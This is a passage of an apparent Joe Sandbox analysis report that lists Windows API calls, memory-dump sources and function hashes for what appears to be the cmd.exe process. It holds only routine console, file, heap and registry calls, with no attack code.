                                                                            • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00B0DDF0
                                                                            • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04), ref: 00B0DDF9
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                            • String ID:
                                                                            • API String ID: 513048808-0
                                                                            • Opcode ID: 15c14515a10c50d5a46d26432d87a05ea55dfee410055dddc1d8cc3b050cb946
                                                                            • Instruction ID: 8bd25eb6199101c0c9edb0d0c6df8044ba70b123503aac368ac8f709e7f36466
                                                                            • Opcode Fuzzy Hash: 15c14515a10c50d5a46d26432d87a05ea55dfee410055dddc1d8cc3b050cb946
                                                                            • Instruction Fuzzy Hash: 7F11E333804255ABDB114BE8DD8D77A3FE8E747368F6443A5E821930E0DE758E019692
                                                                            APIs
                                                                            • _get_osfhandle.MSVCRT ref: 00B09A1C
                                                                            • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B0793A,00000104,?), ref: 00B09A2B
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374,-00000001), ref: 00B09A47
                                                                            • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374), ref: 00B09A56
                                                                            • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374), ref: 00B09A61
                                                                            • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374,-00000001), ref: 00B09A6A
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                            • String ID:
                                                                            • API String ID: 513048808-0
                                                                            • Opcode ID: 0da9540de470da4f6e77ab2871c4d783b6d56520438dfbe58e6a2e2e60d9deaf
                                                                            • Instruction ID: b59330109050ec134fd8b88d588afeb8537f0f63a162333d29261f7acf76feb6
                                                                            • Opcode Fuzzy Hash: 0da9540de470da4f6e77ab2871c4d783b6d56520438dfbe58e6a2e2e60d9deaf
                                                                            • Instruction Fuzzy Hash: 2801D637A040206BD62147789C8D97B7EECE787734B250365F836E31D1DE708E0191A2
                                                                            APIs
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                            • memset.MSVCRT ref: 00B1D954
                                                                            • longjmp.MSVCRT(00B40A70,000000FF,00000000,00B325C2,00B325C0,?,?,?,?,00B0D980), ref: 00B1D96D
                                                                            • memcpy.MSVCRT(?,00000000,00002000,00000000,00B325C2,00B325C0,?,?,?,?,00B0D980), ref: 00B1D987
                                                                            • longjmp.MSVCRT(00B40A70,000000FF,00B325C2,00B325C0,?,?,?,?,00B0D980), ref: 00B1D9D3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Heaplongjmp$AllocProcessmemcpymemset
                                                                            • String ID: 0123456789
                                                                            • API String ID: 2034586978-2793719750
                                                                            • Opcode ID: bc5d723bc27242ee9536dee1fded55b0e03e01df42215ab17889bfc7bc1acec3
                                                                            • Instruction ID: 094dbacacc9a9fe9cbd00367596c279129ba1497fd23939387b52add4f47c38d
                                                                            • Opcode Fuzzy Hash: bc5d723bc27242ee9536dee1fded55b0e03e01df42215ab17889bfc7bc1acec3
                                                                            • Instruction Fuzzy Hash: 83710735B002069BDB249FA8CC8576E7BF1EB90700F6980E9E945973D4EB719E46CB90
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B05074
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000001), ref: 00B0515F
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BCA7
                                                                              • Part of subcall function 00B0BC30: iswspace.MSVCRT ref: 00B0BD1D
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD39
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD5D
                                                                            • iswspace.MSVCRT ref: 00B19289
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: wcschr$iswspacememset
                                                                            • String ID: %s
                                                                            • API String ID: 2220997661-3043279178
                                                                            • Opcode ID: 9d2bebfb233293499a6f1ff689d0fcd71fb520ddcadd6e9ca0a307ec74fb4e7b
                                                                            • Instruction ID: a808adbc9178bb43c710435d8c559ff17d45b3f42b57815d52c4c4966d7ca974
                                                                            • Opcode Fuzzy Hash: 9d2bebfb233293499a6f1ff689d0fcd71fb520ddcadd6e9ca0a307ec74fb4e7b
                                                                            • Instruction Fuzzy Hash: 6051D375A00216ABDB24DF6498566BFB7F5FF58310F5440EDE846E7280EB309E81CB94
                                                                            APIs
                                                                            • RtlCreateUnicodeStringFromAsciiz.NTDLL(?,?), ref: 00B27121
                                                                            • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00B27197
                                                                            • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00B271FF
                                                                            Strings
                                                                            • %WINDOWS_COPYRIGHT%, xrefs: 00B27107
                                                                            • Copyright (c) Microsoft Corporation. All rights reserved., xrefs: 00B270EE
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                            • String ID: %WINDOWS_COPYRIGHT%$Copyright (c) Microsoft Corporation. All rights reserved.
                                                                            • API String ID: 1103618819-4062316587
                                                                            • Opcode ID: ffc56e93f66e205046e713a8095a7683ec60dfc9056da655f52b294bc8ff64a5
                                                                            • Instruction ID: 939ef70f59f045aa041bb5fb5d8b4056074d65dc82f90e86a7a6b09a71acd671
                                                                            • Opcode Fuzzy Hash: ffc56e93f66e205046e713a8095a7683ec60dfc9056da655f52b294bc8ff64a5
                                                                            • Instruction Fuzzy Hash: 6C410835B4022587CB20CF68A8917BA73F5FF49701F6800A9E949FB350EE659E43C395
                                                                            APIs
                                                                            • CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000001,?,00000000,001F0003,?,?,?,?), ref: 00B22652
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B22670
                                                                            • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00B22694
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$CreateSemaphore
                                                                            • String ID: _p0$wil
                                                                            • API String ID: 4049970386-1814513734
                                                                            • Opcode ID: d85a5d550143ab7c403726e94698b21c0392be7749bcc25744b46af3ccc3d69e
                                                                            • Instruction ID: 39599fd3e8c1ca4a93f9ee22e25e3ab9ff7c44ef829456b405905ce60f79cd70
                                                                            • Opcode Fuzzy Hash: d85a5d550143ab7c403726e94698b21c0392be7749bcc25744b46af3ccc3d69e
                                                                            • Instruction Fuzzy Hash: 9731E876B401299BCB26DF24ED99AAA73F5FF94310F1441E8E809C7250DE70DE40CB60
                                                                            APIs
                                                                            • _wcsnicmp.MSVCRT ref: 00B25295
                                                                              • Part of subcall function 00B1727B: __iob_func.MSVCRT ref: 00B17280
                                                                            • fprintf.MSVCRT ref: 00B25215
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: __iob_func_wcsnicmpfprintf
                                                                            • String ID: CMD Internal Error %s$%s$Null environment
                                                                            • API String ID: 1828771275-2781220306
                                                                            • Opcode ID: fb1ac51f40d7bdab39718fac37d354788b7dc1e556c1cf851bdd56c879f761dd
                                                                            • Instruction ID: 773b5a3b71c9bde0f0b51c7306b790146f29db315b0364f31f8135e34ab1d7e7
                                                                            • Opcode Fuzzy Hash: fb1ac51f40d7bdab39718fac37d354788b7dc1e556c1cf851bdd56c879f761dd
                                                                            • Instruction Fuzzy Hash: 64314F36E00621DBCB38AB68AC45AAEB7E1EF54700F1444EDEC0EA32C1EA705E41C655
                                                                            APIs
                                                                              • Part of subcall function 00B0AB7F: iswspace.MSVCRT ref: 00B0AB8D
                                                                              • Part of subcall function 00B0AB7F: wcschr.MSVCRT ref: 00B0AB9E
                                                                            • wcschr.MSVCRT ref: 00B0B3FC
                                                                            • wcschr.MSVCRT ref: 00B0B40E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: wcschr$iswspace
                                                                            • String ID: &<|>$+: $=,;
                                                                            • API String ID: 3458554142-2256444845
                                                                            • Opcode ID: cdfd81b308a11888facda076c31104656ca0518a66ffe768d1acb17ab612641f
                                                                            • Instruction ID: a0195a0dd60297bc045eeb6858fd71d818d1069e56641367d3dba451909bac22
                                                                            • Opcode Fuzzy Hash: cdfd81b308a11888facda076c31104656ca0518a66ffe768d1acb17ab612641f
                                                                            • Instruction Fuzzy Hash: 2A113632A00125A6C7349F268455DBEBFE6EFA2750B2840EAE8C1973C1F7719E40D315
                                                                            APIs
                                                                            • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 00B04D66
                                                                            • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 00B04D8A
                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00B04D95
                                                                            Strings
                                                                            • UBR, xrefs: 00B04D82
                                                                            • Software\Microsoft\Windows NT\CurrentVersion, xrefs: 00B04D5C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                            • API String ID: 3677997916-3870813718
                                                                            • Opcode ID: 9dc8f92e450166bdf569413f92ac62cdbba680b8dc9f9ced92400f2014cb9c02
                                                                            • Instruction ID: 3eaf29d23a349b6ae547be1a3b01d85c2021b77dc39ed32e0eb5cb9318b4b47e
                                                                            • Opcode Fuzzy Hash: 9dc8f92e450166bdf569413f92ac62cdbba680b8dc9f9ced92400f2014cb9c02
                                                                            • Instruction Fuzzy Hash: 5F011DB6A40218BBDB219B94DC45FDEBBFCEB84750F1005A6FA01A2190D770AE15DA50
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B0FD3A
                                                                            • wcsspn.MSVCRT ref: 00B0FF18
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,00B12229,00000000,-00000105,?,00000000,00000000), ref: 00B1000F
                                                                              • Part of subcall function 00B11CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00B080F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B11D3A
                                                                              • Part of subcall function 00B11CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00B080F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B11D44
                                                                              • Part of subcall function 00B11CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00B080F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B11D57
                                                                              • Part of subcall function 00B11CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00B080F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B11D61
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$FullNamePathmemsetwcsspn
                                                                            • String ID:
                                                                            • API String ID: 1535828850-0
                                                                            • Opcode ID: 0b13455cdaeb3fc53bbb55d95631fdf7aff9485ccba3b40e9fd5328a765c9b99
                                                                            • Instruction ID: f1f09e6476f8f0ddb309925c4eb960ce9aff19399c88f60e2076adfd6d956162
                                                                            • Opcode Fuzzy Hash: 0b13455cdaeb3fc53bbb55d95631fdf7aff9485ccba3b40e9fd5328a765c9b99
                                                                            • Instruction Fuzzy Hash: FDC16F75A00215CFDB25DF18C895BA9BBF6FB48314F5481EAD50A9B691EB309EC2CF40
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_setjmp3
                                                                            • String ID:
                                                                            • API String ID: 4215035025-0
                                                                            • Opcode ID: 76e0b0d5fa2a3dbfd929551d6889553f523cb39e83710145ce64063e23840fdc
                                                                            • Instruction ID: 95d2c9a01679d2a9700ef2e65e64b5507db2b55cdbec9595af8efc6eda65cde5
                                                                            • Opcode Fuzzy Hash: 76e0b0d5fa2a3dbfd929551d6889553f523cb39e83710145ce64063e23840fdc
                                                                            • Instruction Fuzzy Hash: FC515EB1A012699BDB24CBA5DC94AEFBBB8EB44340F5440E9E509A3580DB308F84CF65
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B29631
                                                                            • memset.MSVCRT ref: 00B2964F
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • _wcsicmp.MSVCRT ref: 00B296FD
                                                                            • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,?,?,?,?,00000000,?), ref: 00B2971B
                                                                            • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,?,?,?,?,00000000,?), ref: 00B29733
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_wcsicmp
                                                                            • String ID:
                                                                            • API String ID: 1670951261-0
                                                                            APIs
                                                                            • _get_osfhandle.MSVCRT ref: 00B29527
                                                                            • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B2952F
                                                                            • _get_osfhandle.MSVCRT ref: 00B295B5
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B295BD
                                                                              • Part of subcall function 00B28C50: longjmp.MSVCRT(00B40A70,00000001,00B0206C,00B05E68,?,?,?,?,00000000), ref: 00B28CC4
                                                                              • Part of subcall function 00B28C50: memset.MSVCRT ref: 00B28D1D
                                                                              • Part of subcall function 00B28C50: memset.MSVCRT ref: 00B28D45
                                                                              • Part of subcall function 00B28C50: memset.MSVCRT ref: 00B28D6D
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B295CC
                                                                              • Part of subcall function 00B0A16C: _close.MSVCRT ref: 00B0A19B
                                                                            Similarity
                                                                            • API ID: memset$File_get_osfhandle$ErrorLastPointerRead_closelongjmp
                                                                            • String ID:
                                                                            • API String ID: 288106245-0
                                                                            APIs
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00B11775,-00000001,-00000001,-00000001,-00000001), ref: 00B12650
                                                                            • _get_osfhandle.MSVCRT ref: 00B1F339
                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00B11775,-00000001,-00000001,-00000001,-00000001), ref: 00B1F347
                                                                            • longjmp.MSVCRT(00B40A30,00000001,?,00000104,00000000,?,?,00B11775,-00000001,-00000001,-00000001,-00000001), ref: 00B1F383
                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00B187F0,?,?,?,00B187F0,00000000,?,00B04A0A), ref: 00B1F390
                                                                              • Part of subcall function 00B0DD98: _get_osfhandle.MSVCRT ref: 00B0DDA3
                                                                              • Part of subcall function 00B0DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B1C050), ref: 00B0DDAD
                                                                            Similarity
                                                                            • API ID: BufferConsoleInfoScreen$Heap_get_osfhandle$AllocFileProcessTypelongjmp
                                                                            • String ID:
                                                                            • API String ID: 158340877-0
                                                                            APIs
                                                                            • _get_osfhandle.MSVCRT ref: 00B14CC2
                                                                            • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B28FB3,?,00000000,?,?,?,?,?,?,?,00000000,?,00000021,00000000,?), ref: 00B14CCA
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B20BFC
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B20C48
                                                                            • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00B20C71
                                                                            Similarity
                                                                            • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                            • String ID:
                                                                            • API String ID: 3588551418-0
                                                                            APIs
                                                                            • _get_osfhandle.MSVCRT ref: 00B0E29B
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B0E2A3
                                                                            Similarity
                                                                            • API ID: FilePointer_get_osfhandle
                                                                            • String ID:
                                                                            • API String ID: 1013686580-0
                                                                            APIs
                                                                              • Part of subcall function 00B0DD98: _get_osfhandle.MSVCRT ref: 00B0DDA3
                                                                              • Part of subcall function 00B0DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B1C050), ref: 00B0DDAD
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00B28571
                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 00B2857E
                                                                            • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,00000000,?,?), ref: 00B285C7
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,00000000), ref: 00B285D5
                                                                            • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00B285DC
                                                                            Similarity
                                                                            • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                            • String ID:
                                                                            • API String ID: 3008996577-0
                                                                            APIs
                                                                            • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00B17122
                                                                            • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00B17131
                                                                            • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00B1713A
                                                                            • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00B17143
                                                                            • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00B17158
                                                                            Similarity
                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                            • String ID:
                                                                            • API String ID: 1445889803-0
                                                                            APIs
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,00B187E5,00000000,?,00B04A0A), ref: 00B2484A
                                                                              • Part of subcall function 00B0DD98: _get_osfhandle.MSVCRT ref: 00B0DDA3
                                                                              • Part of subcall function 00B0DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B1C050), ref: 00B0DDAD
                                                                            • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,00B187E5,00000000,?,00B04A0A), ref: 00B24879
                                                                            • _getch.MSVCRT ref: 00B2487F
                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00B187E5,00000000,?,00B04A0A), ref: 00B24897
                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00B187E5,00000000,?,00B04A0A), ref: 00B248AD
                                                                            Similarity
                                                                            • API ID: CriticalSection$BufferConsoleEnterFileFlushHandleInputLeaveType_get_osfhandle_getch
                                                                            • String ID:
                                                                            • API String ID: 491502236-0
                                                                            APIs
                                                                              • Part of subcall function 00B06513: memset.MSVCRT ref: 00B06593
                                                                              • Part of subcall function 00B0DC60: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,00B08E86,00B08E5A,00000000), ref: 00B0DC98
                                                                              • Part of subcall function 00B0DC60: RtlFreeHeap.NTDLL ref: 00B0DC9F
                                                                            • memset.MSVCRT ref: 00B1A097
                                                                            Similarity
                                                                            • API ID: Heapmemset$FreeProcess
